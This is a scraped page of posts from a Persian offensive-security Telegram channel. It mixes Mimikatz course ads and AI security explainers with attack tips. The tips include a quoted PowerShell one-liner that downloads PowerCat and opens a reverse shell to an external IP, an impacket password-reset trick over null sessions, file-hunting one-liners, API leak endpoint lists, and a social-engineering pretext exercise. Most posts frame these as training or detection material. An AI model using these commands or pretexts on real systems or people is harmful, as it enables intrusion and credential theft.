tryhackbox | Unsorted

Telegram-канал tryhackbox - Try Hack Box

6712

1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفه‌ای شو.

Subscribe to a channel

Try Hack Box

معماری RAG: طراحی، امنیت و حملات

RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام می‌کند تا پاسخ‌های دقیق‌تر و مبتنی بر داده تولید کند.

اجزای اصلی معماری

1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابی‌شده تولید می‌کند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را به‌روز نگه می‌دارد.

فرآیند عملیاتی

کاربر سوال می‌پرسد → سوال به بردار تبدیل می‌شود → Retriever اسناد مرتبط را بازیابی می‌کند → Generator پاسخ نهایی را تولید می‌کند.

حملات رایج به RAG

1. Knowledge Poisoning: تزریق داده‌های مخرب به پایگاه دانش برای انحراف پاسخ‌ها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به داده‌های کاربران دیگر در سیستم‌های چندمستاجره.

چالش‌های امنیتی

- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابی‌شده.
- Access Control: جلوگیری از دسترسی به داده‌های حساس یا طبقه‌بندی‌شده.
- Hallucination Mitigation: کاهش توهم‌های مدل با استفاده از منابع معتبر.

معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدل‌های زبانی است، اما نیازمند لایه‌های دفاعی چندگانه برای مقابله با حملات نوظهور است.

🔥 اولین کانال فارسی زبان در AI Security .

@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial

Читать полностью…

Try Hack Box

ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.

ا▪️ :  AI agent ها فقط چت‌ بات نیستند.

آنها میتوانند استدلال کنند، برنامه‌ ریزی کنند، ابزارها را فراخوانی کنند، به داده‌ ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم‌ های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حمله‌ی جدید و یک kill chain جدید ایجاد می‌ کند.

درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن‌ های معمولی در نظر گرفته شوند.

آنها به دسترسی سخت‌گیرانه‌ی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه‌ مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.

با گسترش استفاده‌ی سازمانها از agentic AI، فقط ایمن‌ سازی مدل کافی نخواهد بود.

باید خودِ agent، identity آن، tools آن، memory آن، داده‌هایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.


🔥 اولین کانال فارسی زبان در AI Security .

@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial

Читать полностью…

Try Hack Box

یکی از قدیمی‌ ترین و خطرناک‌ ترین پروتکل‌ ها که هنوز روی خیلی از دستگاه‌ ها پیدا میشه.

دستورات حمله واقعی به Telnet رو ببینید 👇

https://x.com/i/status/2079051452673147071

Читать полностью…

Try Hack Box

📌 برگزاری جلسه ویس چت : 

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : مهتاب کسائی

📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖  لینک جلسه :


🎙 قسمت اول
⁉️ موضوعات ما :

◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔
@RadioZeroPod
🆔
@TryHackBox

Читать полностью…

Try Hack Box

در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و می‌خوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.

در حال حاضر، برای این نقش‌ ها به‌ صورت مشخص نیاز داریم:

- Front-end Development

- Back-end Development
- Database
- DevOps و Cloud

اگر در یکی از این حوزه‌ ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.

چرا این همکاری می‌تونه ارزشمند باشه؟

✅ تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار

✅ همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرم‌افزار

✅ ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)

✅ گواهی همکاری پس از مشارکت مؤثر

✅ امکان استفاده از پروژه در رزومه، LinkedIn و GitHub

✅ اولویت برای همکاری‌ های بلندمدت در صورت رشد پروژه


این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفه‌ای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.


🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :

@ThbxSupport

Читать полностью…

Try Hack Box

بایپس احراز هویت از طریق Forged Session Cookie

(مرکز مدیریت فایروال امن سیسکو)

تحلیل:
- فقط وجود کوکی CGISESSID را بررسی می‌کند.
- اما بررسی نمی‌ کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.

تاثیر:
یک مهاجم می‌ تواند یک مقدار دلخواه یا پیش‌ فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت‌ شده دسترسی غیرمجاز پیدا کند.

پس اگر واقعاً از خواندن مطالب این‌چنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥

@TryHackBox

Читать полностью…

Try Hack Box

📌 برگزاری جلسه ویس چت : 

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص زمینه DFIR به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : صابر غفاری مقدم

📅 زمان برگزاری: سه شنبه 1405/04/16
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖  لینک جلسه :



🎙 قسمت اول
⁉️ موضوعات ما :

◾ا:  DFIR در مقیاس: واقعیت‌ های فارنزیک و معماری در امن‌سازی زیرساخت بانکی تراکنشی»

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔
@RadioZeroPod
🆔
@TryHackBox

Читать полностью…

Try Hack Box

پورت ۲۲: SSH : شل امن
حمله‌ی Brute Force، سرقت Key، Tunneling و Misconfigurationها

ا : SSH پروتکل اصلی مدیریت از راه دور برای سیستم‌های لینوکس/یونیکس است.


https://x.com/i/status/2073644099408691670

#ردتیم

Читать полностью…

Try Hack Box

📌 برگزاری جلسه ویس چت :  مهندس پیمان خدابنده

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص حوزه Red Teaming به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : پیمان خدابنده

📅 زمان برگزاری: جمعه 1405/04/12
📍 پلتفرم: گوگل میت
🕗 ساعت : 20:00
🔖  لینک جلسه :

https://meet.google.com/ebv-ozik-wns

🎙 قسمت اول
⁉️ موضوعات ما :

◾ مقدمه‌ای بر Red Teaming و جایگاه Malware در فرآیند حمله + تحلیل استاتیک بدافزار

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔
@RadioZeroPod
🆔
@TryHackBox

Читать полностью…

Try Hack Box

اگر در حوزه امنیت اطلاعات فعالیت می‌ کنید، چه سهمی از زندگی‌ تان صرف کار و کسب درآمد از مهارت‌ هایتان می‌شود؟

شما چطور بین کار و زندگی تعادل برقرار می‌کنید؟ چه کارهایی انجام میدهید تا از فشار کاری فاصله بگیرید، ذهنتان را ریکاوری کنید و دوباره با انرژی برگردید؟ تجربه‌ها و ترفندهایتان را با بقیه به اشتراک بگذارید.

Читать полностью…

Try Hack Box

خیلی‌ها فکر میکنند ابزار Mimikatz قدیمی شده و دیگه استفاده نمیشه. این تصور کاملاً قابل درکه، چون ابزارهای جدید و تکنیک‌های پیشرفته‌ای هر روز معرفی میشن. اما واقعیت اینه که Mimikatz هنوز یکی از مهم‌ترین و پرکاربردترین ابزارها در دنیای واقعی امنیت سایبریه چرا Mimikatz هنوز قابل استفادس ؟
استفاده گسترده اون توسط ردتیمرها ، پنتسترها و تیم‌ های امنیتی سازمان‌ ها هنوز از Mimikatz (یا نسخه‌های fork شده و در-memory اون) برای شبیه‌ سازی حملات واقعی، استخراج credentialها، Privilege Escalation و Lateral Movement استفاده میکنند. این ابزار جزء استاندارد toolkitهای Metasploit، Cobalt Strike و خیلی از فریم‌ ورک‌های مدرن هست و حتی روی Windows 10/11 با privilege مناسب، هنوز مؤثر عمل میکنه. Microsoft سعی کرده محدودیت‌ هایی بذاره (مثل غیرفعال کردن WDigest)، اما Mimikatz مدام به‌روزرسانی میشه و تکنیک‌ های جدید رو پشتیبانی میکنه. بسیاری از حملات واقعی هنوز از credential dumping با Mimikatz الهام میگیرن و یک ابزار دوگانه Mimikatz نه تنها برای مهاجمان، بلکه برای دفاع هم حیاتیه. اگر بخوای بدونی اتکرها چطور credentialها رو سرقت میکنن، چطور در شبکه حرکت میکنن و چطور دفاعت رو تست کنی، باید عمیق بشناسی‌ اش. بدون درک Mimikatz، تشخیص و جلوگیری از خیلی از حملات واقعی سخت میشه.

هنوز در گزارش‌ های Red Canary، SentinelOne، Varonis و حملات APTها و ransomwareها ردپای Mimikatz (یا تکنیک‌های مشابه) دیده میشه. خیلی از تست‌ های امنیتی سازمانی هم بدون این ابزار کامل نیست.

گاهی اوقات برای بایپس کردن تشخیص‌ های امنیتی (EDR/AV) یا کار کردن بهتر روی نسخه‌های خاص ویندوز، نیاز هست سورس کد Mimikatz رو تغییر بدی، کامپایل کنی یا از فورک‌ های به‌روز شده استفاده کنی. این دقیقاً یکی از مهارت‌ های عملی مهمیه که متخصصان واقعی بلدند.

صرفا برای دوستانی که فکر میکنند این ابزار کارایی نداره ، اگر مطلبی بود اضافه کنید




@TryHackBox

Читать полностью…

Try Hack Box

📌 دوره : راهنمای جامع ابزار Mimikatz

💢 توضیحات دوره : Mimikatz بدون شک یکی از مهم‌ ترین و مؤثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می‌ گیرد. این ابزار توسط برنامه‌ نویس فرانسوی Benjamin Delpy ایجاد شد. او در ابتدا Mimikatz را برای یادگیری عمیق‌ تر زبان C و درک بهتر مکانیزم‌ های امنیتی ویندوز توسعه داد.

این ابزار با بهره‌ برداری هوشمند از ضعف‌ های موجود در معماری ویندوز، مجموعه‌ای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می‌ دهد. Mimikatz کار را برای متخصصان بسیار آسان‌ تر کرده است؛ به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی، می‌ توان از آن برای گسترش دسترسی در شبکه‌ های مبتنی بر ویندوز استفاده کرد. این ابزار همچنان فعالانه به‌ روزرسانی می‌شود و تکنیک‌ های جدید به آن اضافه می‌ گردد.

💢 با تدریس: مهندس سجاد تیموری

⭕ مشاهده جزئیات دوره و خرید:


Link



◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه

⭕ دوره دارای گروه پشتیبانی می باشد.

💰 قیمت :     ۲,۰۰۰,۰۰۰  تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید، به ایدی زیر پیام دهید:

@ThbxSupport

Читать полностью…

Try Hack Box

🔖 جستجو برای فایل‌های رمزگذاری شده

در ماژول
Password Attack -> Cracking Protected Files
یک دستور ساده یک خطی برای پیدا کردن فایل‌ های احتمالا رمزگذاری شده (دارای پسورد) در لینوکس ارائه شده است.

$ for ext in $(echo ".xls .xls* .xltx .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done


جستجوی مشابهی را می‌توان در ویندوز با استفاده از powershell انجام داد. برای جستجو در پوشه کاربر فعلی، C:\ را با $env:USERPROFILE جایگزین کنید
".xls",".xls*",".xltx",".od*",".doc",".doc*",".pdf",".pot",".pot*",".pp*" | % { "`nFile extension: $_"; gci C:\ -Recurse -Filter "*$ _" -ea 0 | ? { $_.FullName -notmatch "lib|fonts|share|core" } | % FullName }


@TryHackBox
@TryHackBoxOfficial
@RadioZeroPod
@TryHackBoxStory

Читать полностью…

Try Hack Box

🔥 بازنشانی رمز عبور منقضی شده حساب دامنه از طریق null-session و SAMR

یک مقاله جالب در دنیای فناوری خواندم و با روشی برای بازنشانی رمز عبور منقضی شده از طریق null-session برخورد کردم.

اصل مطلب:
در صورت خطای STATUS_PASSWORD_MUST_CHANGE، روش‌های استاندارد مانند impacket-changepasswd و smbpasswd ممکن است در ویندوزهای جدید کار نکنند. اما یک ترفند وجود دارد که نیاز است هاستی با null-session مجاز پیدا کنید (از طریق nxc smb $IP -u '' -p '' بررسی کنید) و دستور زیر را اجرا کنید:

impacket-changepasswd -protocol smb-samr -newpass 'NewPass' 'domain\user:OldPass@<IP_с_null_sess> -dc-ip <IP_DC>'

در این حالت باید از پروتکل smb-samr استفاده شود.

مثال:
impacket-changepasswd -protocol smb-samr -newpass 'NewP@ssw0rd321!' 'duty-free.cc/user1:P@ssw0rd12@192.168.78.2 -dc-ip 192.168.78.1'


چرا این کار می‌کند؟ پروتکل SAMR (سرویس RPC مدیریت حساب‌ها) اجازه می‌دهد بدون احراز هویت قبلی رمز عبور را تغییر دهید کافی است رمز عبور قدیمی و جدید را در فراخوانی RPC از طریق اتصال ناشناس ارسال کنید.

@TryHackBox
@TryHackBoxOfficial
@RadioZeroPod
@TryHackBoxStory

Читать полностью…

Try Hack Box

📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.

اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!

منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند.


همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 تخفیف
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان 
💥 با تخفیف : ۲۰۰,۰۰۰ تومان
⚠️ مهلت تخفیف: ۲ روز


📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
@TryHackBox

Читать полностью…

Try Hack Box

⭕ سری چالش های SE : هک انسان 1/20

📌 چالش : "تماس IT پشتیبانی"

سناریو:

شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس می‌گیرید.

📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).

📓 اطلاعات از پیش:

◾ شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.

◾ می‌دونید شرکت هفته پیش یک آپدیت سیستمی داشته.

◾میترا معمولاً ساعت ۹ صبح سرکاره.

❓ سوال:

> شما چه دیالوگ و استراتژی‌ ای برای این تماس استفاده می‌ کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار می‌برید رو تو کامنت بنویسید).



⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی

@TryHackBox
#مهندسی_اجتماعی

Читать полностью…

Try Hack Box

🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شده‌ام.

🔖 طبق این
گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است

◾ یک ابزار متن‌باز، مشابه Netcat، برای اجرای یک شل معکوس:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق می‌کند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می‌ کنند.

بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"

AND

cmdline: "powercat"

فراموش نکنید که بلوک‌ های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.

@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod

Читать полностью…

Try Hack Box

/channel/+XPV3S0tygl1lZGE0

Читать полностью…

Try Hack Box

هک سیستم ‌های SCADA : پیداکردن سیستم ‌های SCADA با استفاده از Censys

همانطور که می‌دانید، سیستم ‌های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار می‌گیرند. این سیستم ‌های صنعتی هستند که در برخی موارد، می‌توانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می ‌شوند. پیداکردن آن‌ ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial

Читать полностью…

Try Hack Box

چهار گروه بدافزار، پلیس پاکستان را با استفاده از PlugX، ShadowPad، Remcos و Cobalt Strike مورد هدف قرار دادند.

محققان امنیت سایبری، جزئیاتی از فعالیت‌های جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیت‌ها توسط گروه‌هایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.

https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html

@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox

Читать полностью…

Try Hack Box

⭕️ قسمت هشتم زیرو تاک

📌 موضوع جلسه : مقدمه‌ای بر Red Teaming و جایگاه Malware در فرآیند حمله + تحلیل استاتیک بدافزار

🎙 مهمان برنامه : مهندس پیمان خدابنده

منتظر جلسه بعدی باشید.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی

🆔
@RadioZeroPod
🆔
@TryHackBox
🆔
@TryHackBoxOfficial
🆔
@TryHackBoxStory

Читать полностью…

Try Hack Box

❗ تخفیف ویژه ❗

📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.

📕 جزئیات بیشتر کتاب


💰 قیمت : ۲۵۰,۰۰۰ تومان
💰 تخفیف : ۱۹۰,۰۰۰ تومان


📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته

📕 جزئیات بیشتر کتاب

💰 قیمت : ۲۵۰,۰۰۰ تومان
💰 تخفیف : ۱۸۰,۰۰۰ تومان

📖 شکار عملی باگ بانتی : از Recon تا Bounty واقعی : متدولوژی و شناسایی و آسیب پذیری های دنیای واقعی

📕 جزئیات بیشتر کتاب

💰 قیمت : ۳۶۰,۰۰۰ تومان
💰تخفیف : ۲۸۰,۰۰۰ تومان



‼️ مهلت تخفیف : 3 روز

📌 جهت خرید به ایدی زیر پیام دهید:

@THBxSupport

Читать полностью…

Try Hack Box

دوستان اگر سوالی دارید حتما داخل گروه بپرسید تا در جلسات آینده مطرح شه

Читать полностью…

Try Hack Box

دوستان آماده باشید تا نیم ساعت دیگر

Читать полностью…

Try Hack Box

این چیت شیت جامع شامل دستورات کاربردی و سریع برای Host & Network Discovery و Service Enumeration و Web Enumeration است.

بدون توضیح اضافی دستورات آورده شده تا به عنوان مرجع سریع برای پنتسترها، متخصصان امنیت سایبری و هکرهای اخلاقی استفاده شود. کافیست IP یا دامنه هدف را جایگزین کنید و از آن‌ها بهره ببرید.

https://lnkd.in/dEbMZyCw

@TryHackBox

Читать полностью…

Try Hack Box

📌 دوره: راهنمای جامع ابزار Mimikatz

💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم‌ ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می‌ گیرد.این ابزار توسط برنامه‌ نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق‌ تر زبان C و درک بهتر مکانیزم‌ های امنیتی ویندوز توسعه داد.

این ابزار با بهره‌ برداری هوشمند از ضعف‌ های موجود در معماری ویندوز،مجموعه‌ای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می‌ دهد. Mimikatz کار را برای متخصصان بسیار آسان‌ تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می‌ توان از آن برای گسترش دسترسی در شبکه‌ های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به‌ روزرسانی می‌شود و تکنیک‌ های جدید به آن اضافه می‌ گردد.


📌 توضیحات کامل

◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.

💰 قیمت :     ۲,۰۰۰,۰۰۰  تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان

📌 جهت خرید،به ایدی زیر پیام دهید:

@ThbxSupport
Group
@TryHackBox

Читать полностью…

Try Hack Box

"نشت اطلاعات حساس و عدم وجود مجوز از طریق اندپوینت API"

برای پیدا کردن باگ‌ های نشت اطلاعات در وردپرس از این فهرست سریع من استفاده کنید:

/api/v1/export/data
/api/v1/config
/api/debug/env
/api/v2/auth/sessions
/api/v1/admin/users
/wp-json/wordfence/v1/config
/api/v1/billing/details
/api/v1/db/stats
/api/v1/logs
/api/v1/health
/api/v1/status
/api/v1/internal/settings
/api/v1/cloud/credentials
/api/v1/user/profile
/api/v1/system/info
/api/v1/backup/list
/wp-json/wp/v2/users
/wp-json/wp/v2/settings
/wp-json/wp/v2/media
/wp-json/wp/v2/posts?status=any
/wp-json/wp/v2/pages?status=private
/wp-json/elementor/v1/system-info


پس دوستان اگر واقعاً از خواندن چنین روش‌ هایی لذت می‌برید، عشق‌ تان را نشان دهید🔥

@TryHackBox
#باگ_بانتی #نشت_اطلاعات

Читать полностью…

Try Hack Box

درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .

@KavehOffSec

Читать полностью…

Try Hack Box

در اینجا یک LLM-honeypot از Beelzebub برای گرفتار کردن کریپتوجکرها آوردم.

این یک تلهٔ سادهٔ SSH است که به‌ جای پاسخ‌ های ایستا با قالب‌ های ثابت، به مهاجم با متنی واقعی‌ نما پاسخ می‌ دهد که توسط یک LLM تولید می‌شود. بدین‌ ترتیب رفتار سرور طبیعی به‌ نظر می‌رسد، اپراتور پاسخ‌ های قابل‌ باور به دستورات را می‌گیرد و لاگ تمام نشست‌ های جعلی ذخیره می‌ شود.

ساختار پایهٔ تله (YAML):

apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH LLM Honeypot"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 120
plugin:
    llmProvider: "openai"
    llmModel: "gpt-4o"
    openAISecretKey: "sk-proj-1234567890""``


ویژگی‌ های پیکربندی:

◾️ پروتکل SSH (یکی از رایج‌ ترین بردارهای حمله) + پورت غیرمرسوم 2222 (برای کاهش نویز اسکنرها).

regex: "^(.+)$"
◾️ هر دستور/رشتهٔ وارد شده را می‌گیرد و به پلاگین LLM می‌ فرستد.

serverVersion / serverName
بنر/نام میزبان را شبیه‌ سازی می‌ کنند تا کریپتوجکر هنگام اتصال آن را ببیند.

passwordRegex
چند ترکیب نام‌ کاربری/رمز عمداً ضعیف پیش‌ تعریف‌ شده.
deadlineTimeoutSeconds
اگر نشست بیش از 120 ثانیه بیکار بماند، قطع می‌ شود.
◾️پارامترهای plugin ادغام با LLM شرکت OpenAI، در این مثال مدل gpt-4o و کلید دسترسی.

می‌ توانید بخش plugin را دقیق‌ تر بنویسید؛ مثلاً مقدار temperature برای تنوع/خلاقیت پاسخ‌ ها اضافه کنید و با contextMemory تاریخچهٔ دستورات را نگهداری کنید تا تولید متن بهتر شود. پیاده‌ سازی و قابلیت‌ ها بسته به نیاز شماست.

در این تله، Beelzebub با دقت مسیر نشست کریپتوجکر را ثبت کرده: شناسایی میزبان (uname, uptime, nproc)، بررسی GPU (lspci, nvidia-smi)، جمع‌ آوری اطلاعات CPU/شبکه، تلاش برای ایجاد persistence و حذف رقبا (دستورات مانند chpasswd، pkill xmrig|cnrig|kswapd0 و غیره)، دانلود و اجرای اسکریپت نصب با curl … | bash. در مثال شرح‌داده‌شده، اسکریپت xmrig را برای ماینینگ Monero تنظیم می‌کرد و به C3Pool متصل می‌ شد.

@TryHackBox
@TryHackBoxOfficial
@RadioZeroPod
@TryHackBoxStory

#هوش_مصنوعی #امنیت_سایبری

Читать полностью…

Try Hack Box

بررسی عمیق یک سیستم کشف و پاسخ الکترونیکی که توسط سازمان‌های امنیتی چین به کار گرفته شده است

https://netaskari.substack.com/p/chinas-guardian-of-secrets

@pfksecurity

Читать полностью…
Subscribe to a channel